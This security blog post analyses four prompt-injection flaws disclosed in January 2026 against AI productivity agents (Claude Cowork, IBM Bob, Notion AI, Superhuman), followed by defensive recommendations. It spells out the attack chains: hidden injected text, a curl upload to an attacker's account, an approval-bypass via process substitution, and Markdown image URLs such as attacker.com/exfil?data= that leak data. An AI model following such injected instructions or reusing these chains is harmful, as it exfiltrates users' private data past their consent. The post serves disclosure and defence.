Four production AI tools. Four data exfiltration vectors. One week.

Between January 7th and January 15th, 2026, security researchers publicly disclosed critical vulnerabilities in four major AI-powered productivity tools: IBM Bob, Superhuman AI, Notion AI, and Anthropic’s Claude Cowork. Each exploit demonstrated the same fundamental attack pattern—indirect prompt injection leveraging what security researcher Simon Willison has termed the “lethal trifecta”: access to private data, exposure to untrusted content, and the ability to externally communicate.

These aren’t theoretical proofs-of-concept. They’re production exploits against tools trusted by Fortune 500 companies, healthcare organizations, and government contractors. And they all share a disturbing characteristic: data exfiltration occurs before users can intervene.

CISO Marketplace | Cybersecurity Services, Deals & Resources for Security LeadersThe premier marketplace for CISOs and security professionals. Find penetration testing, compliance assessments, vCISO services, security tools, and exclusive deals from vetted cybersecurity vendors.Cybersecurity Services, Deals & Resources for Security Leaders

The Common Thread: Understanding Indirect Prompt Injection

Traditional cybersecurity operates on clear trust boundaries. Code runs. Data doesn’t execute. Instructions come from authenticated sources.

Large language models obliterate these boundaries. An LLM cannot reliably distinguish between trusted instructions from a developer and malicious commands embedded in a PDF, email, or web page it processes. Everything is tokens. Everything can be an instruction.

The lethal trifecta materializes when three capabilities converge:

  • Access to private data - Customer records, emails, financial documents, internal communications
  • Exposure to untrusted content - User uploads, web searches, integrated third-party data sources
  • Exfiltration vector - Any external communication channel (HTTP requests, rendered images, API calls)

When all three exist in the same context window, attackers can manipulate the AI into stealing data without exploiting a single line of vulnerable code.

Search : ai | CISO Insights: Voices in CybersecurityCISO Insights: The Cybersecurity Leadership Podcast
Where Security Leaders Shape Tomorrow’s Defenses

Join us for CISO Insights, the definitive podcast for cybersecurity executives navigating today’s evolving threat landscape. Each episode d…PodbeanPodBean Development

Case Study 1: Claude Cowork File Exfiltration (January 13-15)

Timeline: Launched January 13, exploited January 15 Vendor Response: Known vulnerability since October 2025, deployed with issue unresolved

Anthropic’s Claude Cowork launched as a general-purpose AI agent for everyday work automation. Within 48 hours, PromptArmor demonstrated complete file exfiltration.

The Attack Vector

Claude Cowork restricts most outbound network traffic to prevent data theft. Anthropic’s own API domain (api.anthropic.com) is whitelisted as “trusted.” Attackers exploited this design decision.

Attack Chain:

  • User connects Cowork to local folder containing confidential real estate files
  • User uploads a malicious “skill” document (appears as legitimate Markdown, saved as .docx)
  • Hidden prompt uses 1-point white-on-white text with 0.1 line spacing—effectively invisible
  • User asks Cowork to analyze files using the uploaded skill
  • Injection manipulates Cowork to execute: curl command to Anthropic’s file upload API with attacker’s API key
  • Largest available file uploads to attacker’s account via Files API
  • Attacker retrieves loan estimates, partial SSNs, financial data through their Anthropic dashboard

What Makes This Critical

The vulnerability was previously disclosed. Security researcher Johann Rehberger reported the Files API exfiltration flaw to Anthropic on October 25, 2025 via HackerOne. Anthropic acknowledged but did not remediate the issue.

Three months later, they launched Cowork—marketed to non-technical users for organizing desktop files—with the identical vulnerability intact. Anthropic built the tool in “a week and a half” using Claude Code, prioritizing development velocity over security remediation.

Anthropic’s official response: Users should “avoid granting access to local files with sensitive information” while simultaneously encouraging Cowork to organize your Desktop.

Even Opus 4.5, Anthropic’s most sophisticated model with enhanced reasoning capabilities, fell victim. Prompt injection exploits architectural vulnerabilities, not model intelligence gaps.

Community Discussion: HackerNews thread reached #1, generating extensive debate about AI security responsibilities.

Case Study 2: IBM Bob Malware Execution (January 7)

Timeline: Discovered during closed beta testing Vendor Response: “Unaware of the vulnerability,” despite public disclosure

IBM’s Bob coding agent, currently in closed beta, can be manipulated to download and execute arbitrary malware if users configure “always allow” for any single benign command.

CISO Marketplace | Cybersecurity Services, Deals & Resources for Security LeadersThe premier marketplace for CISOs and security professionals. Find penetration testing, compliance assessments, vCISO services, security tools, and exclusive deals from vetted cybersecurity vendors.Cybersecurity Services, Deals & Resources for Security Leaders

The Attack Vector

Bob implements command substitution blocking via $(command) as a security measure. It failed to check for process substitution using >(command).

Attack Chain:

  • User explores new GitHub repository with Bob’s assistance
  • Repository README contains hidden prompt injection posing as “phishing training exercise”
  • Bob prompts user with three benign echo commands
  • User selects “always allow” for echo to reduce friction
  • Injection delivers: echo <(malicious_retrieval_command) | <(execution_command)
  • By prefixing with echo, entire chain auto-approves without additional consent
  • Malware downloads and executes with user completely unaware

PromptArmor’s analysis revealed the vulnerability in minified JavaScript code:

function detectCommandSubstitution(cmd) {
  if (
    (ch === "$" && nxt === "(") ||  // $(...) detected
    (ch === "<" && nxt === "(") ||  // <(...) detected
    (ch === "`" && !inBacktick)     // `...` detected
    // MISSING: '>' followed by '(' for process substitution >(...) 
  ) {
    return true;
  }
  return false;
}

Why This Matters

Bob is positioned for enterprise software development. The attack enables:

  • Ransomware execution
  • Credential theft
  • Device takeover
  • Spyware deployment
  • Botnet recruitment

IBM’s response after public disclosure: “We can’t find any record of IBM having been notified directly of this vulnerability.”

The Bob IDE also suffers from zero-click data exfiltration via Markdown image rendering with permissive Content Security Policy allowing requests to storage.googleapis.com.

Community Discussion: HackerNews thread with technical analysis of the vulnerability.

Case Study 3: Notion AI Unpatched Data Exfiltration (January 7-8)

Timeline: Reported December 24, closed as “Not Applicable” December 29, publicly disclosed January 7 Vendor Response: Initially rejected vulnerability report, remediated after public disclosure

Notion AI renders AI-generated edits before receiving user approval, creating a silent exfiltration window.

The Attack Vector

When Notion AI suggests document changes, it displays an approval prompt. Unknown to users, the edit has already been written to the document and rendered in the browser before they click Accept or Reject.

Attack Chain:

  • User uploads resume to Notion workspace (contains hidden white-on-white prompt injection)

  • User requests: “Help me update hiring tracker notes for this candidate” Injection instructs Notion AI to:

  • Extract all text from hiring tracker (salaries, candidate feedback, diversity goals, role details)

  • Construct URL: https://attacker.com/exfil?data=[stolen_content]

  • Insert as Markdown image: ![](https://attacker.com/exfil?data=[...])

  • Browser automatically requests “image,” sending data to attacker’s server

  • Approval prompt appears—but data already exfiltrated via automatic image prefetch

  • User clicking “Reject” doesn’t matter—request already sent

PromptArmor demonstrated exfiltration of:

  • Internal salary expectations
  • Candidate assessment notes
  • Role details and headcount planning
  • Diversity hiring objectives
  • Personal information about job applicants

The Disclosure Breakdown

December 24, 2025: PromptArmor reports via HackerOne December 24, 2025: Notion requests different format December 24, 2025: PromptArmor submits updated report December 29, 2025: Notion closes report as “Not Applicable” January 7, 2026: Public disclosure January 8, 2026: Notion validates vulnerability, deploys remediation

Notion has 100 million users, 4 million paying customers, and counts Amazon, Nike, Uber, and Pixar among its enterprise clients. Over half of Fortune 500 companies use the platform.

The Notion Mail AI drafting assistant exhibited similar vulnerabilities when users mentioned untrusted resources while composing emails.

Update: After reaching HackerNews front page (discussion here), Notion’s security team confirmed remediation is now in production. However, the initial “Not Applicable” response to a clearly documented vulnerability raises questions about AI security maturity in the organization.

AI Security Risk Assessment ToolSystematically evaluate security risks across your AI systemsAIRiskAssess.comAIRiskAssess Team

Case Study 4: Superhuman AI Email Exfiltration (January 12)

Timeline: Disclosed January 12 Vendor Response: Treated as high-priority incident, rapid remediation

Grammarly recently acquired Superhuman, creating an AI-powered productivity suite. PromptArmor identified indirect prompt injection vulnerabilities allowing email and data exfiltration.

The Attack Vector

Superhuman whitelisted docs.google.com in its Content Security Policy. Google Forms on that domain persist data via GET requests, creating an exfiltration channel.

Attack Chain:

  • Attacker sends email containing hidden prompt injection

  • User queries: “Summarize my recent mail” Injection manipulates Superhuman AI to:

  • Find and analyze dozens of emails from past hour (financial, legal, medical content)

  • Construct pre-filled Google Form submission URL with stolen email data

  • Render URL as Markdown image: ![](https://docs.google.com/forms/...)

  • Browser automatically submits form via image request

  • Attacker reads submissions from their Google Form

Network logs showed URLs containing complete email contents—names, email addresses, sensitive communications—transmitted before any user interaction.

Extended Attack Surface

Superhuman Go (their agentic product) presented broader risks:

  • Reads data from arbitrary web pages
  • Connects to GSuite, Outlook, Stripe, Jira, Google Contacts
  • User asks about active browser tab (online review site)
  • Review site contains injection
  • AI outputs 1-pixel malicious image
  • Financial data from surfaced emails exfiltrates to attacker

Grammarly’s agent-powered docs showed similar Markdown image vulnerabilities, though reduced scope (only active document and queries processed, not full email access).

Vendor Response: The Exception

Superhuman handled this disclosure exceptionally well:

  • Escalated to security incident response immediately
  • Disabled vulnerable features at “incident pace”
  • Communicated fix timelines proactively
  • Demonstrated security as organizational priority

PromptArmor noted this response was “in the top percentile” for AI vulnerability disclosures.

Analysis: Simon Willison’s technical breakdown and HackerNews discussion.

The Vendor Response Spectrum

These four incidents reveal dramatically different security cultures:

Best Practice: Superhuman

  • Immediate escalation and incident response
  • Rapid remediation at production pace
  • Proactive communication with researchers
  • Security prioritized over feature availability

Delayed Recognition: Notion

  • Initial dismissal of valid vulnerability report
  • Remediation only after public disclosure
  • Policy gap between triage and engineering teams
  • Eventual proper response once validated

Known-Issue Launch: Anthropic

  • Acknowledged vulnerability three months prior
  • Launched product to broader audience without fix
  • Development velocity prioritized over remediation
  • Shifted security responsibility to end users

Awareness Failure: IBM

  • Claimed no record of vulnerability notification despite public disclosure
  • Product in beta with fundamental security design flaws
  • Process substitution oversight in security validation code

These responses correlate directly with organizational AI security maturity and risk management priorities.

What This Means for Enterprise Security

The Uncomfortable Reality

Traditional security models assume:

  • Clear trust boundaries between code and data
  • Authentication validates instruction sources
  • Firewalls and network segmentation contain threats
  • Users can evaluate and approve risky actions

AI agents invalidate all four assumptions simultaneously.

CISO Marketplace | Cybersecurity Services, Deals & Resources for Security LeadersThe premier marketplace for CISOs and security professionals. Find penetration testing, compliance assessments, vCISO services, security tools, and exclusive deals from vetted cybersecurity vendors.Cybersecurity Services, Deals & Resources for Security Leaders

Immediate Actions for Security Teams

1. Audit AI Agent Deployments Against Lethal Trifecta

Map every AI tool accessing:

  • Private data (email, documents, databases, customer records)
  • Untrusted content (user uploads, web search, third-party integrations)
  • External communication (API calls, image rendering, webhooks)

Any system with all three requires immediate risk assessment.

2. Implement “Agents Rule of Two”

Inspired by Google Chrome’s security model, limit AI agents to maximum two of three properties within single session:

  • Access to confidential data
  • Processing untrusted content
  • External communication capability

If all three required, mandate human-in-the-loop approval or session isolation.

3. Restrict Network Egress for AI Environments

Default-deny external network access from AI execution contexts. Whitelist only essential services with strict validation of:

  • Destination domains
  • Request parameters
  • Data payloads
  • API key ownership (prevent cross-account file uploads)

4. Content Security Policy Hardening

Prevent automatic rendering of untrusted images/links in AI outputs:

  • Disable Markdown image auto-loading from external domains
  • Require explicit user consent before external resource requests
  • Implement strict CSP that blocks known exfiltration channels

5. Pre-Rendering Approval Gates

AI-generated content containing external references must receive explicit approval before being written to documents or rendered in browsers. This prevents the Notion-style attack where data exfiltrates during the approval window.

6. Tool Access Governance

Apply least-privilege principles to AI agent tool permissions:

  • Separate agents for untrusted content processing vs. sensitive data access
  • Time-bound credential grants
  • Audit logs for all tool invocations
  • Anomaly detection for unusual tool usage patterns

7. Vendor Security Assessments

Before deploying AI productivity tools:

  • Request vulnerability disclosure and remediation timelines
  • Evaluate track record responding to security research
  • Review architecture for lethal trifecta conditions
  • Contractual guarantees around security incident response
  • Understand where processing occurs and data residency

The Long-Term Challenge

No current LLM architecture can reliably distinguish instructions from data. OpenAI’s CISO has acknowledged prompt injection as a “frontier security challenge” without clear solution.

Papers like “Agents Rule of Two” and Google DeepMind’s CaMeL approach offer mitigation patterns, but consensus remains: general-purpose agents cannot provide meaningful safety guarantees with current model architectures.

What’s Coming

The velocity of AI agent adoption far exceeds security tool development. We’re witnessing:

Expansion of Attack Surface:

  • Model Context Protocol (MCP) enables mixing untrusted tool sources
  • Multi-agent systems create distributed privilege escalation paths
  • Long-term memory poisoning affects future sessions
  • Tool chaining amplifies single injection into cascading exploits

Sophistication of Attacks:

  • Adaptive injections that bypass detection systems
  • Steganographic hiding techniques in various file formats
  • Cross-agent contamination through shared context
  • Social engineering targeting approval fatigue

Regulatory Pressure:

  • GDPR implications for automated data exfiltration
  • Healthcare compliance (HIPAA) for medical record access
  • Financial services regulations (SOX, PCI-DSS)
  • Potential AI-specific security mandates

The Security Researcher’s Dilemma

Four vulnerabilities. Five days. All discovered by the same team (PromptArmor).

This raises critical questions:

  • How many similar vulnerabilities exist undiscovered?
  • What incentivizes responsible disclosure vs. weaponization?
  • Are bug bounty programs adequate for AI-specific attacks?
  • Should regulatory frameworks mandate security review before AI agent launches?

The rapid deployment of AI agents into production environments—often built in “a week and a half”—suggests security research velocity lags behind development by orders of magnitude.

CISO Marketplace | Cybersecurity Services, Deals & Resources for Security LeadersThe premier marketplace for CISOs and security professionals. Find penetration testing, compliance assessments, vCISO services, security tools, and exclusive deals from vetted cybersecurity vendors.Cybersecurity Services, Deals & Resources for Security Leaders

Recommendations for Development Teams

Architecture-First Security:

  • Design against lethal trifecta from initial specification
  • Separate contexts for trusted vs. untrusted content processing
  • Explicit session boundaries preventing cross-contamination
  • Defense-in-depth assuming prompt injection will succeed

Pre-Launch Security Review:

  • Red team testing by AI security specialists
  • Adversarial prompt injection test suites
  • Third-party security audit before general availability
  • Staged rollout with monitoring for anomalous behavior

Transparency:

  • Public disclosure of AI security architecture
  • Clear documentation of data access and communication capabilities
  • Vulnerability disclosure program with committed response SLAs
  • Regular security posture updates

Conclusion: The Permissionless AI Problem

These vulnerabilities share a fundamental characteristic: they arise from features, not bugs.

Access to email makes AI assistants useful. Web search enables research capabilities. File access allows automation. Each capability independently provides value. Combined, they create the lethal trifecta.

We’re deploying AI agents with the default assumption of broad permissions. Every new connector, every additional data source, every integration expands the attack surface. The Model Context Protocol makes mixing these capabilities trivial for end users who cannot possibly evaluate the security implications.

The uncomfortable truth: Users are combining the lethal trifecta faster than anyone can secure it.

Security teams must shift from reactive patching to proactive architecture. The question isn’t “Can this AI tool be exploited?” but rather “Under what conditions does this tool become unexploitable?”

Until LLM architectures fundamentally change, that answer involves accepting significant capability constraints. The alternative—discovered four times in five days—is production systems exfiltrating sensitive data before users finish reading the approval prompt.


About the Author: Andrew is Managing Member of QSai LLC and operates the CISO Marketplace ecosystem. With 15+ years in cybersecurity and 400+ security assessments across Fortune 100, healthcare, and critical infrastructure, he provides offensive security services, vCISO consulting, and incident response. This analysis draws from real-world penetration testing experience and continuous monitoring of the AI security threat landscape through daily cybersecurity content creation reaching 119K active users globally.

Further Reading:

Core Concepts:

Vulnerability Disclosures:

Security Research & Standards:

News Coverage:

Disclosure: This analysis is based on publicly disclosed vulnerability research. No exploit code is provided. Organizations using affected platforms should review vendor security advisories and implement compensating controls pending patches.